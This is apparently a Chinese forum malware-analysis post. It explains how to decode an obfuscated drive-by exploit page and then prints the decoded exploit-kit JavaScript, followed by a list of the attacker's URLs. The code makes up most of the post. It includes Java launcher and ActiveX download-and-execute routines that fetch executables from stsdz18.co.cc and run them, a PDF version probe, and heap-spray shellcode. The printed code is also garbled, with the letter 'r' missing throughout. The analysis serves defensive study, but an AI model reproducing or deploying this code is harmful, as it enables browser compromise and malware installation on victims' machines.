我说说我的办法:
截取中间以 A 分隔的代码,将 A 替换为 &# ,进行10进制解密。我使用的是Redoce,使用9>转义符清除(&#,)即可。得到的代码杂乱无章,如果仔细读过下面的代码,就可以知道还要进行Xor运算。在Redoce里很简便,选择1>代码区Xor(逻辑异或)运算(参数),在上面的参数框里填13,进行运算,可以得到正常的代码。
-va doa="a"; function java_zdt() { ty { va u = "http://stsdz18.co.cc/x/l.php?s=samba1& -J-ja -J\\\\85.234.190.10\\public\\photo1.jpg none"; if (window.navigato[doa+"ppName"] == "Micosoft Intenet Exploe") { ty { va o = document.ceateElement("OB"+"JE"+""+"CT"); o.classid = "cl"+"s"+""+"id:CAF"+""+"EEF"+""+"AC-DE"+""+"C7-00"+"00-00"+""+"00-ABC"+""+"DE"+""+"FFED"+""+"CBA"; o["l"+""+doa+""+"u"+""+"n"+""+"c"+""+"h"](u); } catch (e) { ty { va o2 = document.ceateElement("OB"+""+"JE"+""+"CT"); o2.classid = "cls"+"id:8A"+""+"D9C840-04"+""+"4E-11D1-B3"+""+"E9-008"+"05F"+""+"499"+"D93"; o2["l"+""+doa+"u"+""+"n"+"c"+""+"h"](u); } catch (e) {java_nop() ; } } } else { va o = document.ceateElement("O"+""+"BJ"+"EC"+""+"T"); va n = document.ceateElement("O"+""+"BJ"+"EC"+""+"T"); o.type = ""+doa+"pplicati"+""+"on/np"+""+"un"+"time-scipt"+""+"able-plu"+""+"gin;de"+"ploy"+""+"me"+""+"ntto"+""+"olkit"; n.type = ""+doa+"pplica"+""+"tion/ja"+""+"va-dep"+""+"lo"+"ym"+""+"ent-too"+""+"lk"+"it"; document.body.appendChild(o); document.body.appendChild(n); ty { o["l"+""+doa+"u"+""+""+""+"n"+"c"+""+"h"](u); } catch (e) {ty { n["l"+""+doa+"u"+""+""+""+"n"+"c"+""+"h"](u);} catch (e) {java_nop() ; } } } } catch (e) {java_nop() ; } } function java_nop() { ty { if (window.navigato[doa+"ppName"] == "Micosoft Intenet Exploe") { va oSpan = document.ceateElement("span");document.body.appendChild(oSpan);oSpan.inneHTML = ''; } else { va o = document.ceateElement("OBJECT"); o.setAttibute("type", "application/x-java-applet");o.setAttibute("launchjnlp", "-J-ja -J\\\\85.234.190.10\\public\\photo1.jpg none");o.setAttibute("docbase", "http://stsdz18.co.cc/x/l.php?s=samba2&");document.body.appendChild(o); } } catch (e) { } } if(doa=="a") java_zdt();if (window.navigato.javaEnabled()) {document.wite("");} document.wite("");va Pdf1 = document.ceateElement("OBJECT");Pdf1.setAttibute("classid", "clsid:CA8A9780-280D-11CF-A24D-444553540000");Pdf1.setAttibute("width", 0);Pdf1.setAttibute("height", 0);Pdf1.setAttibute("id", "Pdf1");document.body.appendChild(Pdf1);function SHOWPDF(fn) { va p = document.ceateElement("ifame"); p.setAttibute("sc", fn); p.setAttibute("width", 10); p.setAttibute("height", 10); p.setAttibute("famebode", "0"); document.body.appendChild(p); }function PDF() {ty {va lv=Pdf1.GetVesions();va fi=/EScipt=([^,]+),/;va fif=/AcoFom=([^,]+),/;lvf=lv.match(fif)[1].split('.');lv=lv.match(fi)[1].split('.');sv=paseInt(lv[0]);lv=paseInt(lv.join(''));lvf=paseInt(lvf.join(''));if (lv<=900){window.location="img1.php?s=i"+lv;}else{window.location="img1.php?s=i"+lv;SHOWPDF("zzimg.php");}} catch (e) {}}setTimeout(function(){PDF()}, 5000);va w4PuUGKzaAG00ITa='http://stsdz18.co.cc/x/l.php?s=m7NEW';function idI8akiHI2gQWbO3(A99gX1DSqmU4PIS5,T95llpyAyJfiREW8){va xox96H9fSOpchJCd=null;ty{xox96H9fSOpchJCd=A99gX1DSqmU4PIS5.CeateObject(T95llpyAyJfiREW8)}catch(e){}if(!xox96H9fSOpchJCd){ty{xox96H9fSOpchJCd=A99gX1DSqmU4PIS5.CeateObject(T95llpyAyJfiREW8,"")}catch(e){}}if(!xox96H9fSOpchJCd){ty{xox96H9fSOpchJCd=A99gX1DSqmU4PIS5.CeateObject(T95llpyAyJfiREW8,"","")}catch(e){}}if(!xox96H9fSOpchJCd){ty{xox96H9fSOpchJCd=A99gX1DSqmU4PIS5.GetObject("",T95llpyAyJfiREW8)}catch(e){}}if(!xox96H9fSOpchJCd){ty{xox96H9fSOpchJCd=A99gX1DSqmU4PIS5.GetObject(T95llpyAyJfiREW8,"")}catch(e){}}if(!xox96H9fSOpchJCd){ty{xox96H9fSOpchJCd=A99gX1DSqmU4PIS5.GetObject(T95llpyAyJfiREW8)}catch(e){}}etun(xox96H9fSOpchJCd);}function JUlXFToXVVy38N5l(Ieoue2NVosZDB2IC){CMyvBw7AGmsi1OpN="updates.exe";va E2uGJ3wmRmO06am4=Ieoue2NVosZDB2IC.CeateObject("Scipting.FileSystemObject","");va sap=idI8akiHI2gQWbO3(Ieoue2NVosZDB2IC,"Sh"+"e"+"l"+"l.App"+"l"+"ica"+"t"+"i"+"on");va SeIigfDUYmhjozvy=idI8akiHI2gQWbO3(Ieoue2NVosZDB2IC,"ADODB.Steam");va iXaK2PWuqY2DdnO=null;CMyvBw7AGmsi1OpN=E2uGJ3wmRmO06am4.BuildPath(E2uGJ3wmRmO06am4.GetSpecialFolde(2),CMyvBw7AGmsi1OpN);SeIigfDUYmhjozvy.Mode=3;ty{iXaK2PWuqY2DdnO=idI8akiHI2gQWbO3(Ieoue2NVosZDB2IC,"Mic"+"o"+"so"+"ft.XM"+"LH"+"T"+"TP");iXaK2PWuqY2DdnO.open("G"+"ET",w4PuUGKzaAG00ITa,false);}catch(e){ty{iXaK2PWuqY2DdnO=idI8akiHI2gQWbO3(Ieoue2NVosZDB2IC,"MSX"+"M"+"L2.XML"+"HT"+"TP");iXaK2PWuqY2DdnO.open("GE"+"T",w4PuUGKzaAG00ITa,false);}catch(e){ty{iXaK2PWuqY2DdnO=idI8akiHI2gQWbO3(Ieoue2NVosZDB2IC,"M"+"SX"+"ML2.Se"+"v"+"eX"+"MLHT"+"TP");iXaK2PWuqY2DdnO.open("GET",w4PuUGKzaAG00ITa,false);}catch(e){ty{iXaK2PWuqY2DdnO=new XMLHttpRequest();iXaK2PWuqY2DdnO.open("GET",w4PuUGKzaAG00ITa,false);}catch(e){etun 0;}}}}SeIigfDUYmhjozvy.Type=1;iXaK2PWuqY2DdnO.send(null);b=iXaK2PWuqY2DdnO.esponseBody;SeIigfDUYmhjozvy.Open();SeIigfDUYmhjozvy.Wite(b);SeIigfDUYmhjozvy.SaveTofile(CMyvBw7AGmsi1OpN,2);sap.ShellExecute(CMyvBw7AGmsi1OpN);etun 1;}function iifzkclCP0LVj8Yo(){va PtuYq1i7naonzeB3=0;va iifzkclCP0LVj8Yod=new Aay('BD96C556-65A3-11D0-983A-00C04FC29E36','BD96C556-65A3-11D0-983A-00C04FC29E30','AB9BCEDD-EC7E-47E1-9322-D4A210617116','0006F033-0000-0000-C000-000000000046','0006F03A-0000-0000-C000-000000000046','6e32070a-766d-4ee6-879c-dc1fa91d2fc3','6414512B-B978-451D-A0D8-FCFDF33E833C','7F5B7F63-F06F-4331-8A26-339E03C0AE3D','06723E09-F4C2-43c8-8358-09FCD1DB0766','639F725F-1B2D-4831-A9FD-874847682010','BA018599-1DB3-44f9-83B4-461454C84BF8','D0C07D56-7C69-43F1-B4A0-25F5A11FAB19','E8CCCDDF-CA28-496b-B050-6C07C962476B',null);while(iifzkclCP0LVj8Yod[PtuYq1i7naonzeB3]){va Ieoue2NVosZDB2IC=null;Ieoue2NVosZDB2IC=document.ceateElement("object");Ieoue2NVosZDB2IC.setAttibute("classid","clsid:"+iifzkclCP0LVj8Yod[PtuYq1i7naonzeB3]);if(Ieoue2NVosZDB2IC){ty{va MTky9xTgkAQYALXW=idI8akiHI2gQWbO3(Ieoue2NVosZDB2IC,"S"+"he"+"l"+"l.App"+"lica"+"ti"+"on");if(MTky9xTgkAQYALXW){if(JUlXFToXVVy38N5l(Ieoue2NVosZDB2IC))etun 1;}}catch(e){}}PtuYq1i7naonzeB3++;}}iifzkclCP0LVj8Yo();function MAKEHEAP() { va qq = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u732F%u7374%u7A64%u3831%u632E%u2E6F%u6363%u782F%u6C2F%u702E%u7068%u733F%u693D%u3665%u505F%u0052%u9000"); va me = new Aay; va z = 548864 - qq.length * 2; va nu = unescape("%u0c0c%u0c0c"); while (nu.length < z / 2) { nu += nu; } va tu = nu.substing(0, z / 2); false; fo (i = 0; i < 270; i++) { me = tu + tu + qq; } va bdy = document.ceateElement("body"); bdy.addBehavio("#default#useData"); document.appendChild(bdy); ty { fo (i = 0; i < 10; i++) { bdy.setAttibute("s", window); } } catch (e) { } window.status += ""; } function IEPEERS() { va gg = document.ceateElement("div"); gg.setAttibute("id", "f"); document.body.appendChild(gg); document.getElementById("f").inneHTML = ""; document.getElementById("atk").onclick(); } setTimeout(function(){IEPEERS()}, 9000);document.wite(" exe.js @@ CScipt.exe exe.js //b //s _Micosoft.XMLHTTP_ _GET_ _http://stsdz18.co.cc/x/l.php__s-newhcp_ _false_ _null_ _ADODB.Steam_ 1 3 _exe.exe_ _WScipt.Shell_ 0 @@ del /f /q exe.js @@ taskkill /im /f HelpCt.exe%2522.eplace(/__/g,Sting.fomChaCode(63)).eplace(/@/g,Sting.fomChaCode(38)).eplace(/_/g,Sting.fomChaCode(34)).eplace(/-/g,Sting.fomChaCode(61))%2529%27%29%29%3C/scipt%3E\" width=\"10\" height=\"10\" hspace=\"0\" vspace=\"0\" famebode=\"0\" scolling=\"0\">");
我整理的结果(可能不全)
关于:hxxp://stsdz18.co.cc/x/index.php解密的日志(全体输出 - 11):
Level 0>http://stsdz18.co.cc/x/index.php
Level 1>http://stsdz18.co.cc/x/l.php?s=ie6_PR
Level 1>http://stsdz18.co.cc/x/l.php?s=m7NEW
Level 1>http://stsdz18.co.cc/x/img1.php?s=i900
Level 2>http://stsdz18.co.cc/x/l.php?s=newp_i900&
Level 2>http://stsdz18.co.cc/x/l.php?s=gicon_i900&
Level 2>http://stsdz18.co.cc/x/l.php?s=email_i900&
Level 2>http://stsdz18.co.cc/x/l.php?s=printf_i900&
Level 1>http://stsdz18.co.cc/x/1.zip ●
Level 1>http://stsdz18.co.cc/x/l.php?s=samba2&
Level 1>http://stsdz18.co.cc/x/l.php?s=samba1&
analyzed by 是昔流芳